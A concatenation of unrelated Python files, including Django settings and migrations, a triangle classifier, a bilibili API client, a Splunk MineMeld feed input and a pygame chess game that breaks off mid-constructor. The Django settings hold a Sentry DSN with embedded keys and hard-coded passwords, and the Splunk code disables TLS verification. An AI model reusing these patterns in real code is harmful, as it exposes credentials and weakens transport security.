        self.norm_n = torch.reshape(norm, shp)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Description: Development settings and globals.
"""
__author__ = "Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)"
from os.path import join, normpath
from base import *
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
# NOTE(review): TEMPLATE_DEBUG was folded into the TEMPLATES setting in newer
# Django releases — harmless here, but confirm the pinned Django version.
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## EMAIL CONFIGURATION
# Development default: mails are printed to the console, never actually sent.
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = 'smtp.gmail.com'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
# SECURITY: placeholder credential committed to source — keep real secrets in
# environment variables, never in settings files.
EMAIL_HOST_PASSWORD = 'password'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = 'info@poppurri.com.ar'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 587
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
# See: https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
# See: https://docs.djangoproject.com/en/dev/ref/settings/#send-broken-link-emails
# NOTE(review): this setting was removed in later Django releases and is
# silently ignored there — confirm against the pinned version.
SEND_BROKEN_LINK_EMAILS = True
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
# SECURITY: development-only credentials; do not reuse them in production.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'poppurri',
        'USER': 'poppurri',
        'PASSWORD': 'poppurri',
        'HOST': '',
        'PORT': '',
    }
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
# In-memory cache per process — suitable for development only.
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
    }
}
########## END CACHE CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
    'debug_toolbar',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
    'debug_toolbar.middleware.DebugToolbarMiddleware',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
DEBUG_TOOLBAR_CONFIG = {
    'INTERCEPT_REDIRECTS': False,
    'SHOW_TEMPLATE_CONTEXT': True,
}
########## END TOOLBAR CONFIGURATION
########## MIXTURE CONFIGURATION
MIXTURE_MAX_RATE = 0
########## END MIXTURE CONFIGURATION
########## WEB CONFIGURATION
WEB_CAROUSEL_MIXTURE_COUNT = 10
WEB_CATEGORIES_COUNT = 3
########## END WEB CONFIGURATION
########## sorl-thumbnail CONFIGURATION
THUMBNAIL_DEBUG = DEBUG
########## END sorl-thumbnail CONFIGURATION
########## GOOGLE ANALYTICS CONFIGURATION
USE_GOOGLE_ANALYTICS = False
########## END GOOGLE ANALYTICS CONFIGURATION
########## SENTRY CONFIGURATION
# SECURITY: Sentry DSN committed to source — rotate it if this repository is
# shared or public.
RAVEN_CONFIG = {
    'dsn': 'http://4af716fc825041d393a9df0164dc910c:3ffcfa72d4f547a9a1d79a0f8cc18d27@sentry.ariel17.com.ar/7',
}
########## END SENTRY CONFIGURATION
# Verbose logging in development: every logger at DEBUG level, routed to both
# Sentry and the console.
for logger in LOGGING['loggers'].keys():
    LOGGING['loggers'][logger]['level'] = 'DEBUG'
    LOGGING['loggers'][logger]['handlers'] = ['sentry', 'console']
# Serve media/static from the local runserver instance.
MEDIA_URL = 'http://localhost:8000/media/'
STATIC_URL = 'http://localhost:8000/static/'
# vim: ai ts=4 sts=4 et sw=4 ft=python
|
from . import stud
from . import cl_info |
# Triangle analyzer: reads three side lengths and classifies the triangle.
# BUGFIX: the original `... and a==b or a==c or b==c` condition let a pair of
# equal sides be reported as a valid isosceles triangle even when the triangle
# inequality failed, because `and` binds tighter than `or`.
print('-='*20)
print('Analisador de Triângulos')
print('-='*20)
a = float(input('Digite o primeiro lado de um triângulo: '))
b = float(input('Digite o segundo lado de um triângulo: '))
c = float(input('Digite o terceiro lado de um triângulo: '))
# Triangle inequality: every side must be shorter than the sum of the other two.
forma_triangulo = a < b + c and b < a + c and c < a + b
if not forma_triangulo:
    print('O seu triângulo não pode ser formado com esses comprimentos.')
elif a == b == c:
    # All three sides equal: equilateral.
    print('O seu triângulo de lados {}, {} e {} pode ser formado e é equilátero!'.format(a,b,c))
elif a == b or a == c or b == c:
    # Exactly two sides equal (equilateral already handled above): isosceles.
    print('O seu triângulo de lados {}, {} e {} pode ser formado e é isóceles!'.format(a,b,c))
else:
    # All sides different: scalene.
    print('O seu triângulo de lados {}, {} e {} pode ser formado e é escaleno!'.format(a,b,c))
#!/usr/bin/env python3
import util
# Index every ss64 "nt" command page found in the saved Documents/ HTML files.
db = util.create_database()
root = "https://ss64.com/nt/"
for soup in util.soups_from_files("Documents/*.html"):
    # Each entry of the A-Z listing links to one command page.
    for anchor in soup.select('.az a[href$=".html"]'):
        util.insert(db, anchor.text, root + anchor.attrs["href"])
|
# Generated by Django 3.0.2 on 2020-01-11 16:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Re-adds Comment.publication (dropped in 0004) as a CASCADE FK."""
    dependencies = [
        ('website', '0004_remove_comment_publication'),
    ]
    operations = [
        migrations.AddField(
            model_name='comment',
            name='publication',
            # default=None on a field without null=True would fail for existing
            # rows — presumably the comment table is empty at this migration
            # point; TODO confirm.
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='website.Publication'),
        ),
    ]
|
# Experiment configuration for CIFAR-10 training with CURE regularization.
CIFAR_CONFIG = {
    # Constants
    "device": "cuda",
    # Data parameters
    "batch_size_train": 100,  # E: Bugs want this to be 100 for cifar
    "batch_size_test": 200,
    "shuffle_train": True,
    # Pixel value range of the (normalised) input images.
    "image_min": 0,
    "image_max": 1,
    # Getter functions
    "dataset": 'CIFAR10',
    "model_name": 'ResNet18',  # SimpleModel or AlexNet or VGG or ResNet18
    # CURE configurations
    "accuracy": 1,  # Can be 1, 2, 4, 6, 8
    "lambda_0": 0,  # Gradient regularizer weight
    "lambda_1": 4,  # Original CURE regularizer weight
    "lambda_2": 0,  # Third order regularizer weight
    "h": [0.1, 0.5, 0.9, 1.3, 1.5],  # Length determines minimum nr of epochs
    "optimization_algorithm": 'Adam',
    "optimizer_arguments": {
        'lr': 1e-4
    },
    "epochs": 10,
    # Perturbation budget expressed in [0, 1] pixel scale.
    "epsilon": 4 / 255,
    # Resume-from-checkpoint support.
    "use_checkpoint": False,
    "checkpoint_file": 'checkpoint_01.data'
}
|
import matplotlib
matplotlib.use('TkAgg') # This is needed for plotting through a CLI call
import matplotlib.pyplot as plt
import pandas as pd
import os
import numpy as np
import itertools
import seaborn as sns
from scipy.stats import ks_2samp
import argparse
import sys
# This function allows violinplots visualization of multiple evaluation models simultaneously and performs a
# Kolmogorov–Smirnov significance test between each combination of models.
# If only one model is selected as input, only the Violinplot will be presented (no test will be superimposed)
# Inputs:
# --listfolders: list of folders that contain the logs - space separated
# --metric: column of "results_eval/evaluation_3Dmetrics.csv" to be used on the plots e.g. dice_class0
# --metadata (optional): 2 elements - (1) column of the participants.tsv metadata so only subjects that belong to that
# category will be used and (2) string to be matched e.g. pathology ms
# Example calls from terminal:
# python3 visualize_and_compare_testing_models.py --listfolders ~/logs/logs_NO_FILM_sctUsers ~/logs/logs_onlyT1w
# or
# python3 visualize_and_compare_testing_models.py --listfolders /home/nas/Desktop/logs/logs_*
# --metric dice_class0 --metadata pathology ms
# Konstantinos Nasiotis 2020
# Dependency: sudo apt-get install python3-tk
# - needed for matplotlib visualization through a CLI call
# ----------------------------------------------------------------------------------------------------------------------#
def main(argv):
    """Violin-plot one evaluation metric across several model log folders and
    run pairwise Kolmogorov-Smirnov tests between every pair of models.

    Parameters
    ----------
    argv : list of str
        Command-line arguments (argparse reads sys.argv itself; kept for the
        historical entry-point signature).
    """
    # defined command line options
    # this also generates --help and error handling
    CLI = argparse.ArgumentParser()
    CLI.add_argument(
        "--listfolders",
        nargs="*",  # 0 or more values expected => creates a list
        type=str,
        default=["/home/nas/Desktop/logs/logs_NO_FILM_Karo/", "/home/nas/Desktop/logs/logs_NO_FILM_sctUsers/"],  # default if nothing is provided - This should give an error later on
    )
    CLI.add_argument(
        "--metric",
        nargs=1,
        type=str,
        default=["dice_class0"],
    )
    CLI.add_argument(
        "--metadata",
        nargs=2,
        type=str,
        default=[],
    )
    # parse the command line
    args = CLI.parse_args()
    args.metric = args.metric[0]
    # access CLI options
    print("listfolders: %r" % args.listfolders)
    print("metric: %r" % args.metric)
    if args.metadata != []:
        print("metadata: %r" % args.metadata)
    # Get the list
    logFoldersToCompare = args.listfolders
    # Fail fast on an empty selection (checked before touching the filesystem).
    if len(logFoldersToCompare) < 1:
        raise Exception('No folders were selected - Nothing to show')
    # Do a quick check that all the required files are present
    for folder in logFoldersToCompare:
        if not os.path.exists(os.path.join(folder, 'results_eval', 'evaluation_3Dmetrics.csv')):
            print('evaluation_3Dmetrics.csv file is not present within ' + os.path.join(folder, 'results_eval'))
            raise Exception('evaluation_3Dmetrics.csv missing')
        if not os.path.exists(os.path.join(folder, 'participants.tsv')):
            print('participants.tsv file is not present within ' + folder)
            raise Exception('participants.tsv missing')
    columnNames = ["EvaluationModel", args.metric]
    df = pd.DataFrame([], columns=columnNames)
    for folder in logFoldersToCompare:
        result = pd.read_csv(os.path.join(folder, 'results_eval', 'evaluation_3Dmetrics.csv'))
        if args.metadata:
            participant_metadata = pd.read_table(os.path.join(folder, 'participants.tsv'), encoding="ISO-8859-1")
            # Select only the subjects that satisfy the --metadata input
            selected_subjects = participant_metadata[participant_metadata[args.metadata[0]] == args.metadata[1]]
            # Now select only the scores from these subjects
            subject_ids = [i.split('_', 1)[0] for i in result["image_id"]]  # Get rid of _T1w, _T2w etc.
            # BUGFIX: membership must be tested against the column VALUES
            # (`x in series` checks the index), and row selection needs a
            # boolean mask (an integer list would select columns instead).
            selected_ids = set(selected_subjects["participant_id"])
            result = result[[sid in selected_ids for sid in subject_ids]]
            if result.empty:
                print('No subject meet the selected criteria - skipping plot for: ' + folder)
        if not result.empty:
            scores = result[args.metric]
            folders = [os.path.basename(os.path.normpath(folder))] * len(scores)
            # BUGFIX: np.object was removed from NumPy (>=1.24) and astype's
            # second positional argument is `copy`, not a value list.
            combined = np.column_stack((folders, scores.astype(object))).T
            singleFolderDF = pd.DataFrame(combined, columnNames).T
            # BUGFIX: DataFrame.append was removed in pandas 2.0.
            df = pd.concat([df, singleFolderDF], ignore_index=True)
    nFolders = len(logFoldersToCompare)
    combinedNumbers = list(itertools.combinations(range(nFolders), 2))
    combinedFolders = list(itertools.combinations(logFoldersToCompare, 2))
    # The metric column arrives as object dtype; force float for plotting.
    df[args.metric] = df[args.metric].astype('float64')
    if not df.empty:
        # Plot all violinplots
        sns.violinplot(x="EvaluationModel", y=args.metric, data=df, color="0.8", inner='quartile')
        sns.stripplot(x="EvaluationModel", y=args.metric, data=df, jitter=True, zorder=1)
        # Display the mean performance on top of every violinplot
        for i in range(len(logFoldersToCompare)):
            temp = df[args.metric][df['EvaluationModel'] == os.path.basename(os.path.normpath(logFoldersToCompare[i]))]
            plt.text(i, df[args.metric].max() + 0.07, str((100 * temp.mean()).round() / 100), ha='center', va='top',
                     color='r')
        if len(logFoldersToCompare) > 1:
            # Perform a Kolmogorov–Smirnov test for all combinations of results & connect the corresponding Violinplots
            for i in range(len(combinedNumbers)):
                dataX = df[args.metric][df['EvaluationModel'] ==
                                        os.path.basename(os.path.normpath(combinedFolders[i][0]))]
                dataY = df[args.metric][df['EvaluationModel'] ==
                                        os.path.basename(os.path.normpath(combinedFolders[i][1]))]
                KStest = ks_2samp(dataX, dataY)
                x1, x2 = combinedNumbers[i]
                # BUGFIX: the bracket baseline must follow the selected metric,
                # not the hard-coded 'dice_class0' column.
                y, h, col = df[args.metric].min() - 0.06 - 0.03 * i, -0.01, 'k'
                plt.plot([x1, x1, x2, x2], [y, y + h, y + h, y], lw=1.5, c=col)
                # Show if the differentiation of the distributions is :
                # Not significant: ns, significant: *, very significant: ***
                # NOTE(review): the 0.5 cut-off looks like a typo for the
                # conventional 0.05 — kept as-is; confirm with the author.
                if KStest.pvalue >= 0.5:
                    plt.text((x1 + x2) * .5, y + h, "ns", ha='center', va='bottom', color=col)
                elif 0.5 > KStest.pvalue >= 0.01:
                    plt.text((x1 + x2) * .5, y + h, "*", ha='center', va='bottom', color='r')
                elif KStest.pvalue < 0.01:
                    plt.text((x1 + x2) * .5, y + h, "***", ha='center', va='bottom', color='r')
        plt.grid()
        plt.show()
        print('success')
    else:
        print('No subjects meet the criteria selected for any model. '
              'Probably you need to change the --metadata / --metric selection')
if __name__ == "__main__":
    # Entry point: forward the CLI args (minus the program name) to main().
    main(sys.argv[1:])
|
# -- coding: utf-8 --
import json
import math
import urllib.request
from .lib.gethttp import *
class Upper:
    """Read-only client for bilibili uploader ("UP主") web APIs.

    Every getter caches its result in the per-instance ``self.__caching`` dict
    under its own method name; pass ``method=1`` to bypass the cache.  All
    getters return a dict with an ``"error"`` key:
    0 = success, 1 = expected data missing (KeyError), 2 = any other failure.
    """

    def __init__(self, uid):
        self.__uid = uid
        # BUGFIX: the cache used to be a mutable class attribute, so every
        # instance shared (and clobbered) the same dict; it is now per-instance.
        self.__caching = {'getUpperVideo': '', 'getUpperNavnum': '', 'getUpperStat': '',
                          'getUpperRelationstat': '', 'getUpperSpaceTop': '', 'getUpperInfo': ''}

    def setUid(self, uid):
        """Replace the uploader id used by subsequent requests."""
        self.__uid = uid

    def getUid(self, uid=None):
        """Return the current uploader id.

        The historical signature took a (unused) positional argument; it is
        now optional so existing callers keep working.
        """
        return self.__uid

    def getUpperVideo(self, method = 0):
        # Fetch the AIDs of every video uploaded by this user (paged, 20/page).
        if method == 0 and self.__caching['getUpperVideo'] != '':
            return self.__caching['getUpperVideo']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/space/arc/search?mid=" + str(self.__uid) + "&pn=1&ps=1")
            DicData = json.loads(JsonData)
            UpperPage = math.ceil(int(DicData['data']['page']['count']) / 20)
            ReData = {"error": 0}
            VideoCount = 0
            for iFolderPage in range(1, UpperPage + 1):
                JsonData = getHttpPage("https://api.bilibili.com/x/space/arc/search?mid=" + str(self.__uid) + "&pn=" + str(iFolderPage) + "&ps=20")
                DicData = json.loads(JsonData)
                for DicData_key in DicData['data']['list']['vlist']:
                    VideoCount = VideoCount + 1
                    ReData[VideoCount] = DicData_key['aid']
        except KeyError:
            ReData = {"error": 1}
        except Exception:
            ReData = {"error": 2}
        # BUGFIX: store under this method's cache slot instead of replacing the
        # whole cache dict (which wiped every other method's cached value).
        self.__caching['getUpperVideo'] = ReData
        return ReData

    def getUpperNavnum(self, method = 0):
        # Fetch the uploader's work counts (videos / audios).
        if method == 0 and self.__caching['getUpperNavnum'] != '':
            return self.__caching['getUpperNavnum']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/space/navnum?mid=" + str(self.__uid))
            DicData = json.loads(JsonData)
            self.__caching['getUpperNavnum'] = {"error": 0,
                                                "video" : DicData['data']['video'],
                                                "audio" : DicData['data']['audio']
                                                }
        except KeyError:
            self.__caching['getUpperNavnum'] = {"error": 1}
        except Exception:
            self.__caching['getUpperNavnum'] = {"error": 2}
        return self.__caching['getUpperNavnum']

    def getUpperStat(self, method = 0):
        # Fetch aggregate view/like statistics over the uploader's works.
        if method == 0 and self.__caching['getUpperStat'] != '':
            return self.__caching['getUpperStat']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/space/upstat?mid=" + str(self.__uid))
            DicData = json.loads(JsonData)
            self.__caching['getUpperStat'] = {"error": 0,
                                              "archive" : DicData['data']['archive']['view'],
                                              "article" : DicData['data']['article']['view'],
                                              "likes" : DicData['data']['likes']
                                              }
        except KeyError:
            self.__caching['getUpperStat'] = {"error": 1}
        except Exception:
            self.__caching['getUpperStat'] = {"error": 2}
        # BUGFIX: return this method's result, not the whole cache dict.
        return self.__caching['getUpperStat']

    def getUpperRelationstat(self, method = 0):
        # Fetch the uploader's following / follower counts.
        if method == 0 and self.__caching['getUpperRelationstat'] != '':
            return self.__caching['getUpperRelationstat']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/relation/stat?vmid=" + str(self.__uid))
            DicData = json.loads(JsonData)
            self.__caching['getUpperRelationstat'] = {"error": 0,
                                                      "following" : DicData['data']['following'],  # accounts this user follows
                                                      "follower" : DicData['data']['follower']  # accounts following this user
                                                      }
        except KeyError:
            self.__caching['getUpperRelationstat'] = {"error": 1}
        except Exception:
            self.__caching['getUpperRelationstat'] = {"error": 2}
        # BUGFIX: return this method's result, not the whole cache dict.
        return self.__caching['getUpperRelationstat']

    def getUpperSpaceTop(self, method = 0):
        # Fetch the video pinned at the top of the uploader's space page.
        if method == 0 and self.__caching['getUpperSpaceTop'] != '':
            return self.__caching['getUpperSpaceTop']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/space/top/arc?vmid=" + str(self.__uid))
            DicData = json.loads(JsonData)
            # The API signals "no pinned video" through the message field.
            if DicData['message'] == '没有置顶视频':
                self.__caching['getUpperSpaceTop'] = {"error": 1}
            else:
                self.__caching['getUpperSpaceTop'] = {
                    "error": 0,
                    "aid": DicData['data']['aid'],  # video AID
                    "title": DicData['data']['title'],  # title
                    "pic": DicData['data']['pic'],  # cover image url
                    "videos": DicData['data']['videos'],  # number of parts
                    "tid": DicData['data']['tid'],  # category id
                    "tname": DicData['data']['tname'],  # category name
                    "copyright": DicData['data']['copyright'],  # original/repost flag
                    "pubdate": DicData['data']['pubdate'],  # publish timestamp
                    "desc": DicData['data']['desc'],  # description
                    "duration": DicData['data']['duration'],  # duration
                    "reason": DicData['data']['reason']  # pin reason
                }
        except KeyError:
            self.__caching['getUpperSpaceTop'] = {"error": 1}
        except Exception:
            self.__caching['getUpperSpaceTop'] = {"error": 2}
        return self.__caching['getUpperSpaceTop']

    def getUpperInfo(self, method = 0):
        # Fetch the uploader's account/profile information.
        if method == 0 and self.__caching['getUpperInfo'] != '':
            return self.__caching['getUpperInfo']
        try:
            JsonData = getHttpPage("https://api.bilibili.com/x/space/acc/info?mid=" + str(self.__uid))
            DicData = json.loads(JsonData)
            ReData = {
                "error": 0,
                "name" : DicData['data']['name'],  # display name
                "sex" : DicData['data']['sex'],  # gender
                "face" : DicData['data']['face'],  # avatar url
                "sign" : DicData['data']['sign'],  # personal signature
                "level" : DicData['data']['level'],  # account level
                "birthday" : DicData['data']['birthday'],  # birthday
                "official_title" : DicData['data']['official']['title'],  # official verification title
                "top_photo" : DicData['data']['top_photo']  # space banner url
            }
        except KeyError:
            ReData = {"error": 1}
        except Exception:
            ReData = {"error": 2}
        # BUGFIX: store under this method's cache slot instead of replacing the
        # whole cache dict.
        self.__caching['getUpperInfo'] = ReData
        return ReData
# encoding = utf-8
import base64
import functools
import json
import os
import requests.exceptions
import sys
import time
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def timer(desc):
    """Decorator factory: record the wrapped function's wall-clock runtime.

    The elapsed time is written into the function's final positional argument
    (a stats dict) under key *desc*.  The slot is pre-set to -1 so that a
    raised exception leaves -1 recorded for that description.

    Note: any function decorated with this must take the stats dict as its
    last positional argument.
    """
    def outer(func):
        @functools.wraps(func)
        def inner(*args):
            stats = args[-1]
            stats[desc] = -1  # sentinel kept if func raises below
            started = time.time()
            result = func(*args)
            # Success path: overwrite the sentinel with the real runtime.
            stats[desc] = time.time() - started
            return result
        return inner
    return outer
def validate_input(helper, definition):
    """Validate the input stanza configuration (placeholder, accepts anything).

    Example of reading a modular-input variable here:
        feed_url = definition.parameters.get('feed_url', None)
        credentials = definition.parameters.get('credentials', None)
    """
    pass
def collect_events(helper, ew):
    """Collect the kvstore events from the feed."""
    # Short name of this feed's input stanza; used to tag kvstore entries.
    stanza = helper.get_input_stanza_names()
    stats = {'input_name': stanza}
    helper.log_info('START Splunk_TA_paloalto indicator retrieval for "{0}"'.format(
        stanza))
    # Drop any kvstore entries left over from a previous run of this source.
    delete_from_kvstore(helper, stanza, stats)
    # Fetch the current entries from the MineMeld feed; on HTTP failure we
    # continue with an empty list so the stats event still gets written.
    entries = []
    try:
        entries = get_feed_entries(helper, stanza, stats)
    except requests.exceptions.HTTPError as e:
        helper.log_error('Failed to get entries for "{0}": {1}'.format(
            stanza, e))
    stats['indicators'] = len(entries)
    # Persist the refreshed entries, then an index event with timing stats.
    save_to_kvstore(helper, stanza, entries, stats)
    save_stats_as_event(helper, ew, stats)
    helper.log_info('END Splunk_TA_paloalto indicator retrieval for "{0}"'.format(
        stanza))
@timer('clear_kvstore')
def delete_from_kvstore(helper, name, stats):
    """Deletes all kvstore entries for splunk_source `name`."""
    query = {'query': json.dumps({'splunk_source': name})}
    # First look up the matching entries, purely so the log line can report
    # how many are about to be removed.
    existing = helper.send_http_request(
        url=_uri(helper),
        headers=_headers(helper),
        method='GET',
        verify=False,
        parameters=query).json()
    helper.log_info('Removing {0} previous entries for MineMeld feed "{1}"'.format(
        len(existing), name))
    resp = helper.send_http_request(
        url=_uri(helper),
        headers=_headers(helper),
        method='DELETE',
        verify=False,
        parameters=query)
    resp.raise_for_status()
@timer('retrieve_indicators')
def get_feed_entries(helper, name, stats):
    """Pulls the indicators from the minemeld feed.

    Returns the normalized entry dicts ready for the kvstore.  Raises
    requests.exceptions.HTTPError if the feed answers with an error status.
    """
    feed_url = helper.get_arg('feed_url')
    feed_creds = helper.get_arg('credentials')
    feed_headers = {}
    # If auth is specified, add it as a Basic auth header.
    if feed_creds is not None:
        auth = '{0}:{1}'.format(feed_creds['username'], feed_creds['password'])
        # BUGFIX: base64.encodestring() required bytes and was removed in
        # Python 3.9; b64encode never inserts newlines, so no .replace()
        # is needed either.
        auth = base64.b64encode(auth.encode('utf-8')).decode('ascii')
        feed_headers['Authorization'] = 'Basic {0}'.format(auth)
    # Pull events as json.
    resp = helper.send_http_request(
        url=feed_url,
        method='GET',
        parameters={'v': 'json', 'tr': 1},
        headers=feed_headers)
    # Raise exceptions on problems.
    resp.raise_for_status()
    feed_entries = resp.json()
    # Return the normalized events to be saved to the kv store.
    return normalized(name, feed_entries)
@timer('save_to_kvstore')
def save_to_kvstore(helper, name, entries, stats):
    """Saves all normalized entries as `name` events."""
    helper.log_info('Saving {0} entries for MineMeld feed "{1}"'.format(
        len(entries), name))
    url = '{0}/batch_save'.format(_uri(helper))
    # The kvstore batch endpoint accepts at most 500 records per request.
    batch_size = 500
    for start in range(0, len(entries), batch_size):
        batch = entries[start:start + batch_size]
        resp = helper.send_http_request(
            url=url,
            headers=_headers(helper),
            method='POST',
            verify=False,
            payload=batch)
        resp.raise_for_status()
def save_stats_as_event(helper, ew, stats):
    """Saves the stats of getting feed events to the index."""
    # Serialize the stats dict as the event payload and hand it to the writer.
    stats_event = helper.new_event(
        source=helper.get_input_type(),
        index=helper.get_output_index(),
        sourcetype=helper.get_sourcetype(),
        data=json.dumps(stats),
    )
    ew.write_event(stats_event)
def _uri(helper):
"""Returns the URL of the kvstore."""
return '/'.join((
helper.context_meta['server_uri'],
'servicesNS',
'nobody',
'Splunk_TA_paloalto',
'storage',
'collections',
'data',
'minemeldfeeds'))
def _headers(helper):
"""Returns the auth header for Splunk."""
return {
'Authorization': 'Splunk {0}'.format(
helper.context_meta['session_key'])}
def normalized(name, feed_entries):
    """Returns a list of normalized kvstore entries.

    Entries missing either 'indicator' or 'value' are dropped; each kept
    entry is copied (the input is not mutated) and tagged with the
    splunk_source so it can later be deleted per-feed.
    """
    return [
        dict(raw, splunk_source=name)
        for raw in feed_entries
        if 'indicator' in raw and 'value' in raw
    ]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-10-28 15:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: makes Mobiles.secondary_camera an optional CharField."""
    dependencies = [
        ('ecom_webapp', '0005_auto_20171028_1504'),
    ]
    operations = [
        migrations.AlterField(
            model_name='mobiles',
            name='secondary_camera',
            # blank=True permits empty form input; null=True permits NULL rows.
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
    ]
|
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from backend.config import DATABASE_URI
# Engine bound to the configured database URI.
# NOTE(review): convert_unicode was removed in SQLAlchemy 1.4+ — confirm the
# pinned SQLAlchemy version before upgrading.  echo=True logs every SQL
# statement; presumably intended for development only — verify for production.
engine = create_engine(DATABASE_URI, convert_unicode=True, echo=True)
# Thread-local session registry; autocommit/autoflush disabled so flushes and
# commits are always explicit.
db_session = scoped_session(
    sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
Base = declarative_base()
# Enables the Model.query shorthand on all declarative models.
Base.query = db_session.query_property()
def init_db():
    """Create all tables registered on Base's metadata (no-op if they exist)."""
    Base.metadata.create_all(engine)
|
# -*- coding: utf-8 -*-
import unittest
from .fixtures import (
fixture_data,
Chain,
SharedInstance,
shared_blockchain_instance,
set_shared_blockchain_instance,
set_shared_config,
)
class Testcases(unittest.TestCase):
    """Tests for the shared blockchain-instance / shared-config singletons."""
    def setUp(self):
        # Reset fixture state before every test.
        fixture_data()
    def test_shared_instance(self):
        """set_shared_blockchain_instance() must store, then replace, the singleton."""
        self.assertFalse(SharedInstance.instance)
        c = Chain()
        set_shared_blockchain_instance(c)
        # Identity (not equality) check: the exact object must be stored.
        self.assertEqual(id(c), id(SharedInstance.instance))
        # Setting a second instance replaces the first.
        c2 = Chain()
        set_shared_blockchain_instance(c2)
        self.assertEqual(id(c2), id(SharedInstance.instance))
    def test_shared_config(self):
        """set_shared_config() must update the shared config, including after an instance is set."""
        self.assertFalse(SharedInstance.config)
        c = Chain()
        set_shared_config(dict(nobroadcast=True))
        self.assertTrue(SharedInstance.config.get("nobroadcast", False))
        # Config updates still take effect after a shared instance exists.
        set_shared_blockchain_instance(c)
        set_shared_config(dict(nobroadcast=False))
        self.assertFalse(SharedInstance.config.get("nobroadcast", True))
|
import pygame
pygame.init()
import json
from datetime import datetime
from random import randrange
import math
from board import board
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent) + '/players_script')
from ai import ai
from human import human
sys.path.append(str(Path(__file__).parent) + '/DAO_script')
from game_history_DAO import game_history_DAO
class chess_game():
    def __init__(self):
        """Set up the window, colour palette, UI state flags and game bookkeeping."""
        # Display surfaces.
        self.width, self.height = 1200, 700
        self.window = pygame.display.set_mode((self.width, self.height))
        self.screen = pygame.Surface(self.window.get_size())
        self.screen = self.screen.convert()
        self.fps = 5
        # Colour palette (RGB tuples).
        self.gray = (125, 125, 125)
        self.black = (0, 0, 0)
        self.light_black = (50, 50, 50)
        self.white = (255, 255, 255)
        self.beige = (204, 174, 92)
        self.orange = (176, 106, 26)
        self.green = (0, 130, 0)
        self.red = (130, 0, 0)
        # Which screen is active: menu / game / history; plus the
        # colour-selection sub-state of the menu.
        self.is_menu = True
        self.is_game = False
        self.is_history = False
        self.select_color = False
        # Clickable button descriptors per screen: [text, left, top, width, height].
        self.history_button_positions = []
        self.game_button_positions = []
        self.game_buttons_init = True
        self.menu_button_positions = []
        self.color_buttons_init = True
        self.game_mode_buttons_init = True
        self.mouse = None  # last MOUSEBUTTONDOWN position, or None
        self.selected_color = None  # "white" or "black"
        self.path = str(Path(__file__).parent) + '/assets/'
        # Board coordinate labels, depending on which colour sits at the bottom.
        self.white_bottom_column_values = {0: "A", 1: "B", 2: "C", 3: "D", 4: "E", 5: "F", 6: "G", 7: "H"}
        self.white_bottom_row_values = {0: "8", 1: "7", 2: "6", 3: "5", 4: "4", 5: "3", 6: "2", 7: "1"}
        self.black_bottom_column_values = {0: "H", 1: "G", 2: "F", 3: "E", 4: "D", 5: "C", 6: "B", 7: "A"}
        self.black_bottom_row_values = {0: "1", 1: "2", 2: "3", 3: "4", 4: "5", 5: "6", 6: "7", 7: "8"}
        # In-game state.
        self.are_players_initialized = False
        self.player_turn = None
        self.game_started = False
        # Top-left pixel of the board drawing area.
        self.starting_pos_left = 50
        self.starting_pos_top = 50
        self.starting_row = None
        self.starting_column = None
        self.game_mode = None  # "Human" or "AI"
        self.game_saved = False
        # Replay / saved-game browsing state.
        self.viewing_current_move = True
        self.viewing_game_in_db = False
        self.current_game_in_bd_viewed = None
        self.viewing_index = 0
        self.game_history_DAO = game_history_DAO()
        self.list_games = []
        # Pending pawn-promotion / last-move bookkeeping.
